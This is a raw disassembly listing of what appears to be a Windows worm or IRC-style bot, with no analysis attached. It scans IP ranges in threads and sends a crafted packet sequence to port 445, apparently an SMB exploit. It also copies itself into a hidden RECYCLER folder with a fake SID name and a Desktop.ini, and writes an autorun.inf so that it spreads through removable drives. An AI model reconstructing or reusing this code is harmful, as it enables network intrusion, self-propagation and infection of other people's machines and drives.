push eax
push [ebp+arg_0]
call sub_41CD84
add esp, 20h
loc_406E5F: ; CODE XREF: sub_406D50+E0�j
cmp [ebp+var_28], 0
jz short loc_406E8C
loc_406E65: ; CODE XREF: sub_406D50+E6�j
push [ebp+var_44]
push offset aKbwmi16jfhl ; "KbwMi16jFhl/"
push [ebp+var_30]
call dword_456FBC ; inet_ntoa
push eax
push edi
push ebx
lea eax, [ebp+var_144]
push esi
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 20h
loc_406E8C: ; CODE XREF: sub_406D50+113�j
push [ebp+var_30]
call dword_456FBC ; inet_ntoa
push eax
lea eax, [ebp+var_210]
push 10h
push eax
call sub_429AEE
lea eax, [ebp+var_144]
push eax
lea eax, [ebp+var_200]
push 80h
push eax
call sub_429AEE
mov eax, [ebp+var_28]
mov ecx, [ebp+var_38]
and [ebp+var_164], 0
mov [ebp+var_15C], eax
mov eax, [ebp+var_20]
add esp, 18h
mov [ebp+var_158], eax
mov eax, [ebp+var_44]
cmp eax, 87h
mov [ebp+var_16C], eax
mov [ebp+var_168], ecx
jnz loc_406FF0
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_403B6C
add esp, 0CCh
test eax, eax
jz short loc_406F8F
xor esi, esi
xor eax, eax
cmp [ebp+var_20], esi
mov [ebp+var_164], eax
jnz short loc_406F62
cmp [ebp+var_28], esi
jnz short loc_406F67
lea eax, [ebp+var_210]
push eax
push offset dword_43A357
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CD84
mov eax, [ebp+var_164]
add esp, 18h
loc_406F62: ; CODE XREF: sub_406D50+1E1�j
cmp [ebp+var_28], esi
jz short loc_406F8F
loc_406F67: ; CODE XREF: sub_406D50+1E6�j
shl eax, 6
lea ecx, [ebp+var_210]
add eax, offset dword_43A357
push ecx
push eax
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
loc_406F8F: ; CODE XREF: sub_406D50+1D2�j
; sub_406D50+215�j
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_404105
add esp, 0CCh
test eax, eax
jz loc_407238
push 2
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz loc_40720B
cmp [ebp+var_28], esi
jnz loc_407210
lea eax, [ebp+var_210]
push eax
push offset byte_43A3D7
jmp loc_4071ED
; ---------------------------------------------------------------------------
loc_406FF0: ; CODE XREF: sub_406D50+19F�j
cmp eax, 8Bh
jnz loc_4070F7
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_4066B3
add esp, 0CCh
test eax, eax
jz short loc_407096
push 4
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz short loc_407069
cmp [ebp+var_28], esi
jnz short loc_40706E
lea eax, [ebp+var_210]
push eax
push offset byte_43A457
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CD84
mov eax, [ebp+var_164]
add esp, 18h
loc_407069: ; CODE XREF: sub_406D50+2E8�j
cmp [ebp+var_28], esi
jz short loc_407096
loc_40706E: ; CODE XREF: sub_406D50+2ED�j
shl eax, 6
lea ecx, [ebp+var_210]
add eax, offset dword_43A357
push ecx
push eax
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
loc_407096: ; CODE XREF: sub_406D50+2D8�j
; sub_406D50+31C�j
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_405990
add esp, 0CCh
test eax, eax
jz loc_407238
push 6
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz loc_40720B
cmp [ebp+var_28], esi
jnz loc_407210
lea eax, [ebp+var_210]
push eax
push offset byte_43A4D7
jmp loc_4071ED
; ---------------------------------------------------------------------------
loc_4070F7: ; CODE XREF: sub_406D50+2A5�j
cmp eax, 1BDh
jnz loc_407238
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_407373
add esp, 0CCh
test eax, eax
jz short loc_40719D
push 0Ah
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz short loc_407170
cmp [ebp+var_28], esi
jnz short loc_407175
lea eax, [ebp+var_210]
push eax
push offset off_43A5D7
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CD84
mov eax, [ebp+var_164]
add esp, 18h
loc_407170: ; CODE XREF: sub_406D50+3EF�j
cmp [ebp+var_28], esi
jz short loc_40719D
loc_407175: ; CODE XREF: sub_406D50+3F4�j
shl eax, 6
lea ecx, [ebp+var_210]
add eax, offset dword_43A357
push ecx
push eax
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
loc_40719D: ; CODE XREF: sub_406D50+3DF�j
; sub_406D50+423�j
sub esp, 0C4h
lea esi, [ebp+var_210]
lea eax, [ebp+var_144]
push 31h
pop ecx
mov edi, esp
push [ebp+var_14C]
rep movsd
push eax
call sub_406391
add esp, 0CCh
test eax, eax
jz short loc_407238
push 3
xor esi, esi
cmp [ebp+var_20], esi
pop eax
mov [ebp+var_164], eax
jnz short loc_40720B
cmp [ebp+var_28], esi
jnz short loc_407210
lea eax, [ebp+var_210]
push eax
push offset byte_43A417
loc_4071ED: ; CODE XREF: sub_406D50+29B�j
; sub_406D50+3A2�j
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CD84
mov eax, [ebp+var_164]
add esp, 18h
loc_40720B: ; CODE XREF: sub_406D50+280�j
; sub_406D50+387�j ...
cmp [ebp+var_28], esi
jz short loc_407238
loc_407210: ; CODE XREF: sub_406D50+289�j
; sub_406D50+390�j ...
shl eax, 6
lea ecx, [ebp+var_210]
add eax, offset dword_43A357
push ecx
push eax
push ebx
lea eax, [ebp+var_144]
push offset aSSIpS ; "%s (%s) -> IP: (%s)"
push eax
push [ebp+arg_0]
call sub_41CD0E
add esp, 18h
loc_407238: ; CODE XREF: sub_406D50+A2�j
; sub_406D50+C7�j ...
push 64h
call dword_43718C ; Sleep
push [ebp+var_4]
call dword_456FD0 ; closesocket
loc_407249: ; CODE XREF: sub_406D50+80�j
; sub_406D50+99�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_406D50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_407252 proc near ; DATA XREF: sub_40A938+665A�o
var_1C0 = byte ptr -1C0h
var_140 = dword ptr -140h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_24 = dword ptr -24h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1C0h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push 4Eh
mov esi, ebx
pop ecx
lea edi, [ebp+var_140]
rep movsd
push [ebp+var_140]
lea esi, [ebp+var_140]
mov dword ptr [ebx+130h], 1
sub esp, 138h
push 4Eh
pop ecx
mov edi, esp
rep movsd
call sub_406C3A
mov esi, dword_43718C
add esp, 13Ch
mov edi, offset aKbwmi16jfhl ; "KbwMi16jFhl/"
loc_4072A7: ; CODE XREF: sub_407252+11C�j
push [ebp+var_38]
push edi
push [ebp+var_24]
call dword_456FBC ; inet_ntoa
push eax
push offset aTarxm0mtxpp_ ; "tArXm0mtxpp."
push edi
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
lea eax, [ebp+var_1C0]
push offset aSSSSStartSD ; "%s %s%s: (%s), Start%s: (%d)"
push eax
call sub_429A33
lea eax, [ebp+var_1C0]
push 270Fh
push eax
mov eax, [ebp+var_2C]
imul eax, 2724h
add eax, offset dword_46AFF0
push eax
call sub_429C40
add esp, 2Ch
lea eax, [ebp+var_8]
lea ecx, [ebp+var_140]
push eax
xor eax, eax
push eax
push ecx
push offset sub_406D50
push eax
push eax
call dword_43717C ; CreateThread
mov [ebp+var_4], eax
loc_407312: ; CODE XREF: sub_407252+CA�j
cmp [ebp+var_C], 1
jz short loc_40731E
push 32h
call esi ; dword_43718C
jmp short loc_407312
; ---------------------------------------------------------------------------
loc_40731E: ; CODE XREF: sub_407252+C4�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
push [ebp+var_34]
and dword ptr [ebx+134h], 0
call esi ; dword_43718C
lea eax, [ebp+var_24]
push 4
push eax
lea eax, [ebp+arg_0]
push eax
call sub_429350
add esp, 0Ch
push [ebp+arg_0]
call dword_456E08 ; ntohl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_456F14 ; ntohl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
lea eax, [ebp+var_24]
push eax
call sub_429350
add esp, 0Ch
jmp loc_4072A7
sub_407252 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407373 proc near ; CODE XREF: sub_406D50+3D2�p
var_11B4 = byte ptr -11B4h
var_1024 = byte ptr -1024h
var_101B = byte ptr -101Bh
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_FFA = dword ptr -0FFAh
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_429A90
push ebx
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
push 2
call dword_4372B4 ; WSAStartup
test eax, eax
jnz loc_407974
lea eax, [ebp+arg_8]
push 5
push eax
call sub_4044F6
pop ecx
cmp eax, 3
pop ecx
mov [ebp+var_4], eax
jnz short loc_4073D7
lea eax, [ebp+arg_8]
push 6
push eax
call sub_4044F6
xor ebx, ebx
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_4073D9
lea eax, [ebp+arg_8]
push 5
push eax
call sub_4044F6
pop ecx
mov [ebp+var_4], eax
pop ecx
jmp short loc_4073D9
; ---------------------------------------------------------------------------
loc_4073D7: ; CODE XREF: sub_407373+3A�j
xor ebx, ebx
loc_4073D9: ; CODE XREF: sub_407373+50�j
; sub_407373+62�j
push 6
push 1
push 2
call dword_456FB0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_C], edi
jz loc_407974
lea eax, [ebp+arg_8]
mov [ebp+var_24], 2
push eax
call dword_456F5C ; inet_addr
push 1BDh
mov [ebp+var_20], eax
call dword_456F18 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push edi
call dword_456E9C ; connect
cmp eax, 0FFFFFFFFh
jz loc_40796D
push ebx
push 89h
push offset dword_43E2C0
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz loc_40796D
mov esi, 1000h
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F38 ; recv
cmp eax, 1
jl loc_40796D
push ebx
push 0BDh
push offset dword_43E350
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz loc_40796D
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F38 ; recv
cmp eax, 0Ah
jle loc_40796D
mov eax, [ebp+var_1004]
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_43E430
call sub_429350
add esp, 0Ch
push ebx
push 111h
push offset dword_43E410
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz loc_40796D
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F38 ; recv
cmp eax, 0Ah
jle loc_40796D
push ebx
push 6Fh
push offset dword_43E528
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz loc_40796D
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F38 ; recv
cmp eax, 0Ah
jle loc_40796D
mov eax, [ebp+var_1004]
push 2
mov [ebp+var_8], eax
lea eax, [ebp+var_8]
push eax
push offset dword_43E5B8
call sub_429350
add esp, 0Ch
push ebx
push 3Bh
push offset dword_43E598
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz loc_40796D
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F38 ; recv
cmp eax, 0Ah
jle loc_40796D
cmp [ebp+var_101B], 0
jnz loc_40796D
mov eax, [ebp+var_1008]
push 2
mov [ebp+var_10], eax
lea eax, [ebp+var_10]
push eax
push offset dword_43E5F4
call sub_429350
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_43E5F8
call sub_429350
add esp, 18h
push ebx
push 6Ah
push offset dword_43E5D8
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz loc_40796D
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F38 ; recv
cmp eax, 0Ah
jle loc_40796D
cmp [ebp+var_101B], 0
jnz loc_40796D
mov eax, [ebp+var_FFA]
push 2
mov [ebp+var_14], eax
lea eax, [ebp+var_10]
push eax
push offset dword_43E664
call sub_429350
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_43E668
call sub_429350
lea eax, [ebp+var_14]
push 2
push eax
push offset byte_43E671
call sub_429350
add esp, 24h
push ebx
push 243h
push offset dword_43E648
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz loc_40796D
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F38 ; recv
cmp eax, 0Ah
jle loc_40796D
cmp [ebp+var_101B], 0
jnz loc_40796D
lea eax, [ebp+var_10]
push 2
push eax
push offset dword_43E8AC
call sub_429350
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_43E8B0
call sub_429350
lea eax, [ebp+var_14]
push 2
push eax
push offset byte_43E8B9
call sub_429350
add esp, 24h
push ebx
push 3Fh
push offset dword_43E890
push edi
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz loc_40796D
push ebx
lea eax, [ebp+var_1024]
push esi
push eax
push edi
call dword_456F38 ; recv
cmp eax, 0Ah
jle loc_40796D
cmp [ebp+var_101B], 0
jnz loc_40796D
lea eax, [ebp+var_10]
push 2
push eax
push offset dword_43E8EC
call sub_429350
lea eax, [ebp+var_8]
push 2
push eax
push offset dword_43E8F0
call sub_429350
lea eax, [ebp+var_14]
push 2
push eax
push offset byte_43E8F9
call sub_429350
push dword_43EC60
push offset dword_43A8E8
push offset byte_43E9E1
call sub_429350
add esp, 30h
cmp [ebp+var_4], 2
mov ebx, offset byte_43EB61
mov edi, offset byte_43EB65
mov esi, offset byte_43EB6D
jnz short loc_407752
push 4
push offset dword_43EBDC
push ebx
call sub_429350
push 4
push offset dword_43EBD8
push edi
call sub_429350
push 4
push offset dword_43EBD4
push esi
call sub_429350
add esp, 24h
loc_407752: ; CODE XREF: sub_407373+3B3�j
cmp [ebp+var_4], 3
jnz short loc_407782
push 4
push offset dword_43EBEC
push ebx
call sub_429350
push 4
push offset dword_43EBE8
push edi
call sub_429350
push 4
push offset dword_43EBE4
push esi
call sub_429350
add esp, 24h
loc_407782: ; CODE XREF: sub_407373+3E3�j
cmp [ebp+var_4], 4
jnz short loc_4077B2
push 4
push offset dword_43EBFC
push ebx
call sub_429350
push 4
push offset dword_43EBF8
push edi
call sub_429350
push 4
push offset dword_43EBF4
push esi
call sub_429350
add esp, 24h
loc_4077B2: ; CODE XREF: sub_407373+413�j
cmp [ebp+var_4], 5
jnz short loc_4077E2
push 4
push offset dword_43EC0C
push ebx
call sub_429350
push 4
push offset dword_43EC08
push edi
call sub_429350
push 4
push offset dword_43EC04
push esi
call sub_429350
add esp, 24h
loc_4077E2: ; CODE XREF: sub_407373+443�j
cmp [ebp+var_4], 6
jnz short loc_407812
push 4
push offset dword_43EC1C
push ebx
call sub_429350
push 4
push offset dword_43EC18
push edi
call sub_429350
push 4
push offset dword_43EC14
push esi
call sub_429350
add esp, 24h
loc_407812: ; CODE XREF: sub_407373+473�j
cmp [ebp+var_4], 7
jnz short loc_407842
push 4
push offset dword_43EC2C
push ebx
call sub_429350
push 4
push offset dword_43EC28
push edi
call sub_429350
push 4
push offset dword_43EC24
push esi
call sub_429350
add esp, 24h
loc_407842: ; CODE XREF: sub_407373+4A3�j
cmp [ebp+var_4], 8
jnz short loc_407872
push 4
push offset dword_43EC3C
push ebx
call sub_429350
push 4
push offset dword_43EC38
push edi
call sub_429350
push 4
push offset dword_43EC34
push esi
call sub_429350
add esp, 24h
loc_407872: ; CODE XREF: sub_407373+4D3�j
xor ebx, ebx
push ebx
push 2FFh
push offset dword_43E8D0
push [ebp+var_C]
call dword_456F6C ; send
cmp eax, 0FFFFFFFFh
jz loc_407968
movzx eax, word_443986
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz short loc_407935
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], ebx
mov ecx, [ecx]
jz short loc_407909
cmp [ebp+arg_BC], ebx
jnz short loc_407911
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_407909: ; CODE XREF: sub_407373+56A�j
cmp [ebp+arg_BC], ebx
jz short loc_407935
loc_407911: ; CODE XREF: sub_407373+572�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 1Ch
loc_407935: ; CODE XREF: sub_407373+543�j
; sub_407373+59C�j
push ebx
lea eax, [ebp+var_1024]
push 1000h
push eax
push [ebp+var_C]
call dword_456F38 ; recv
cmp eax, 0Ah
jle short loc_407968
cmp [ebp+var_101B], 0
jnz short loc_407968
lea eax, [ebp+arg_8]
push eax
call sub_401E8E
xor eax, eax
pop ecx
inc eax
jmp short loc_407976
; ---------------------------------------------------------------------------
loc_407968: ; CODE XREF: sub_407373+518�j
; sub_407373+5DB�j ...
push [ebp+var_C]
jmp short loc_40796E
; ---------------------------------------------------------------------------
loc_40796D: ; CODE XREF: sub_407373+B2�j
; sub_407373+CD�j ...
push edi
loc_40796E: ; CODE XREF: sub_407373+5F8�j
call dword_456FD0 ; closesocket
loc_407974: ; CODE XREF: sub_407373+21�j
; sub_407373+7A�j
xor eax, eax
loc_407976: ; CODE XREF: sub_407373+5F3�j
pop edi
pop esi
pop ebx
leave
retn
sub_407373 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40797B proc near ; CODE XREF: sub_407E1C+A9�p
var_502C = byte ptr -502Ch
var_502B = byte ptr -502Bh
var_291C = byte ptr -291Ch
var_291B = byte ptr -291Bh
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 502Ch
call sub_429A90
and [ebp+var_291C], 0
push ebx
push esi
mov edx, 9C3h
push edi
mov ecx, edx
xor eax, eax
lea edi, [ebp+var_291B]
rep stosd
and [ebp+var_502C], 0
mov ecx, edx
stosw
stosb
xor eax, eax
lea edi, [ebp+var_502B]
rep stosd
stosw
push 1
stosb
call dword_456FE4 ; SetErrorMode
push 2
call dword_456FE4 ; SetErrorMode
push 8000h
call dword_456FE4 ; SetErrorMode
push [ebp+arg_0]
mov esi, dword_437090
lea eax, [ebp+var_291C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push offset aRecycler ; "\\RECYCLER"
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push 0
push eax
call dword_43708C ; CreateDirectoryA
test eax, eax
jnz short loc_407A10
call dword_43716C ; RtlGetLastWin32Error
loc_407A10: ; CODE XREF: sub_40797B+8D�j
mov ebx, dword_437068
lea eax, [ebp+var_291C]
push 7
push eax
call ebx ; dword_437068
call sub_429ACC
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
lea eax, [ebp+var_20C]
push edx
push offset aSDDDDDDDDDDDDD ; "\\S-%d-%d-%d%d-%d%d%d%d%d%d%d%d%d%d-%d%d"...
push 104h
push eax
call sub_429AEE
add esp, 0A0h
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_291C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push 0
push eax
call dword_43708C ; CreateDirectoryA
test eax, eax
jnz short loc_407C00
call dword_43716C ; RtlGetLastWin32Error
loc_407C00: ; CODE XREF: sub_40797B+27D�j
lea eax, [ebp+var_291C]
push 7
push eax
call ebx ; dword_437068
lea eax, [ebp+var_291C]
push offset aDesktop_ini ; "\\Desktop.ini"
push eax
call esi ; dword_437090
xor eax, eax
push eax
push 6
push 2
push eax
push eax
lea eax, [ebp+var_291C]
push 40000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 1
mov [ebp+var_4], eax
jb loc_407DE2
lea ecx, [ebp+var_8]
push 0
push ecx
push 3Fh
push offset a_shellclassinf ; "[.ShellClassInfo]\r\nCLSID={645FF040-5081"...
push eax
call dword_437078 ; WriteFile
test eax, eax
jnz short loc_407C62
mov edi, [ebp+var_4]
xor esi, esi
jmp loc_407E0E
; ---------------------------------------------------------------------------
loc_407C62: ; CODE XREF: sub_40797B+2DB�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
lea eax, [ebp+var_291C]
push eax
call dword_437088 ; lstrlenA
lea eax, [ebp+eax+var_291C]
jmp short loc_407C82
; ---------------------------------------------------------------------------
loc_407C81: ; CODE XREF: sub_40797B+30A�j
dec eax
loc_407C82: ; CODE XREF: sub_40797B+304�j
cmp byte ptr [eax], 5Ch
jnz short loc_407C81
and byte ptr [eax+1], 0
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
idiv edi
lea eax, [ebp+var_108]
push edx
push offset dword_44399C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push 100h
push eax
call sub_429AEE
add esp, 24h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_291C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_502C]
push 270Fh
push eax
push 0
call dword_437178 ; GetModuleFileNameA
lea eax, [ebp+var_291C]
push 1
push eax
lea eax, [ebp+var_502C]
push eax
call dword_437064 ; CopyFileA
mov [ebp+var_4], eax
lea eax, [ebp+var_291C]
push 7
push eax
call ebx ; dword_437068
mov ecx, 9C4h
xor eax, eax
cmp [ebp+var_291C], 5Ch
lea edi, [ebp+var_502C]
rep stosd
lea edi, [ebp+var_291C]
jz short loc_407D4A
loc_407D44: ; CODE XREF: sub_40797B+3CD�j
inc edi
cmp byte ptr [edi], 5Ch
jnz short loc_407D44
loc_407D4A: ; CODE XREF: sub_40797B+3C7�j
lea eax, [ebp+var_502C]
push offset aAutorunOpen ; "[autorun]\r\nopen="
push eax
inc edi
call esi ; dword_437090
lea eax, [ebp+var_502C]
push edi
push eax
call esi ; dword_437090
lea eax, [ebp+var_502C]
push offset aIconSystemroot ; "\r\nicon=%SystemRoot%\\system32\\SHELL32.dl"...
push eax
call esi ; dword_437090
lea eax, [ebp+var_502C]
push edi
push eax
call esi ; dword_437090
lea eax, [ebp+var_502C]
push offset aShellOpenDefau ; "\r\nshell\\open\\default=1"
push eax
call esi ; dword_437090
push [ebp+arg_0]
mov ecx, 9C4h
xor eax, eax
lea edi, [ebp+var_291C]
rep stosd
lea eax, [ebp+var_291C]
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push offset dword_43EC64
push eax
call esi ; dword_437090
lea eax, [ebp+var_291C]
push 80h
push eax
call ebx ; dword_437068
xor esi, esi
lea eax, [ebp+var_291C]
push esi
push 7
push 2
push esi
push esi
push 40000000h
push eax
call dword_43705C ; CreateFileA
mov edi, eax
cmp edi, 1
jnb short loc_407DE6
loc_407DE2: ; CODE XREF: sub_40797B+2BF�j
xor eax, eax
jmp short loc_407E17
; ---------------------------------------------------------------------------
loc_407DE6: ; CODE XREF: sub_40797B+465�j
lea eax, [ebp+var_8]
push esi
push eax
lea eax, [ebp+var_502C]
push eax
call dword_437088 ; lstrlenA
push eax
lea eax, [ebp+var_502C]
push eax
push edi
call dword_437078 ; WriteFile
test eax, eax
jz short loc_407E0E
mov esi, [ebp+var_4]
loc_407E0E: ; CODE XREF: sub_40797B+2E2�j
; sub_40797B+48E�j
push edi
call dword_437044 ; CloseHandle
mov eax, esi
loc_407E17: ; CODE XREF: sub_40797B+469�j
pop edi
pop esi
pop ebx
leave
retn
sub_40797B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E1C proc near ; DATA XREF: sub_40A938+6731�o
var_27D8 = byte ptr -27D8h
var_27D7 = byte ptr -27D7h
var_C8 = dword ptr -0C8h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 27D8h
call sub_429A90
mov eax, [ebp+arg_0]
push esi
push edi
and [ebp+var_27D8], 0
push 31h
mov esi, eax
pop ecx
lea edi, [ebp+var_C8]
rep movsd
mov dword ptr [eax+0BCh], 1
mov ecx, 9C3h
xor eax, eax
lea edi, [ebp+var_27D7]
rep stosd
stosw
and byte ptr [ebp+arg_0+2], 0
mov byte ptr [ebp+arg_0], 20h
stosb
lea eax, [ebp+var_27D8]
mov byte ptr [ebp+arg_0+1], 3Ah
push eax
push 270Fh
call dword_437098 ; GetLogicalDriveStringsA
test eax, eax
jz loc_407F1D
lea ecx, [ebp+var_27D8]
push ebx
mov [ebp+var_4], ecx
